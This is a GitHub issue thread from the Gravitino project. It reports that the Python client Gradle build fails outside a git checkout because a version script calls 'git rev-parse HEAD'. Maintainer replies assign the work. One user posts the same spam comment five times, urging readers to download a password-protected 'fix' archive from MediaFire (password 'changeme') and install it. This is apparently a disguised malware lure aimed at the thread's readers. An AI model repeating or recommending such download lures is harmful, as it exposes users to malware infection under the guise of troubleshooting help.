### ISSUE TITLE
[Bug report] gradlew :clients:client-python:build failed if the package doesn't contain .git directory

### ISSUE THREAD

**Issue by FANNG1** [apache/gravitino#4695]
### Version

main branch

### Describe what's wrong

./gradlew :clients:client-python:build failed if the package doesn't contain .git directory.

### Error message and/or stacktrace

```
fatal: not a git repository (or any of the parent directories): .git
Traceback (most recent call last):
  File "scripts/generate_version.py", line 79, in <module>
    main()
  File "scripts/generate_version.py", line 41, in main
    subprocess.check_output(["git", "rev-parse", "HEAD"]).decode("ascii").strip()
  File "/Users/fanng/release/0.6.0/gravitino-0.6.0-incubating-src/.gradle/python/MacOSX/Miniforge3/envs/python-3.8/lib/python3.8/subprocess.py", line 415, in check_output
    return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
  File "/Users/fanng/release/0.6.0/gravitino-0.6.0-incubating-src/.gradle/python/MacOSX/Miniforge3/envs/python-3.8/lib/python3.8/subprocess.py", line 516, in run
    raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '['git', 'rev-parse', 'HEAD']' returned non-zero exit status 128.
```

### How to reproduce

./gradlew :clients:client-python:build

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jerryshao** [comment]
@diqiu50 would you please help to work on this.

**Comment by jerryshao** [comment]
@diqiu50 please leave a message here, I will assign this issue to you.
